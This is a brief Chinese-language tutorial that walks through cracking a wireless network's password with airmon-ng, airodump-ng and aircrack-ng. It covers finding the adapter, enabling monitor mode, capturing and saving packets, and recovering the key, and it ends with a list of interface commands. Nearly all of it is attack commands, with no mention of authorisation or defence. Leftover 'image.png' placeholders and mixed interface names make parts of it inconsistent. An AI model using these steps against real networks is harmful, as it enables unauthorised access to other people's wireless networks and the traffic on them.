1.找出无线适配器的名称
lo - loopback.本地还回口,目前不重要
eth - 以太网
wlan - 这是我们想要的。注意相关联的后缀。
在终端上键入ifconfig即可查看到网卡。可以加 -a参数查看所有的。
2.启用监视器模式
新版本的kali,使用wlan0mon替代mon0
airmon-ng start wlan0
image.png
3.开始捕获数据包
airodump-ng mon0
image.png
4.将捕获的数据包存储在文件中
airodump-ng mon0 --write aaa文件名
5.破解wifi
aircrack-ng aaa.cap
抓取到的包越大,字典越大,成功率越高。
获得密钥,可能是以下格式:xx:xx:xx:xx:xx
删除冒号
xxxxxxxxxx是无线网络的密码
其他:
ifconfig wlan0 up #开启网卡
ifconfig wlan0 down #关闭网卡
airmon-ng check kill #关闭监听
rfkill unblock all #解锁所有
ifconfig wlan0mon down #关闭网卡
iwconfig wlan0mon mode monitor #开启混淆监听
ifconfig wlan0mon up #网卡开启
airmon-ng stop mon0 #断开WiFi
service network-manager restart #重启网络管理服务
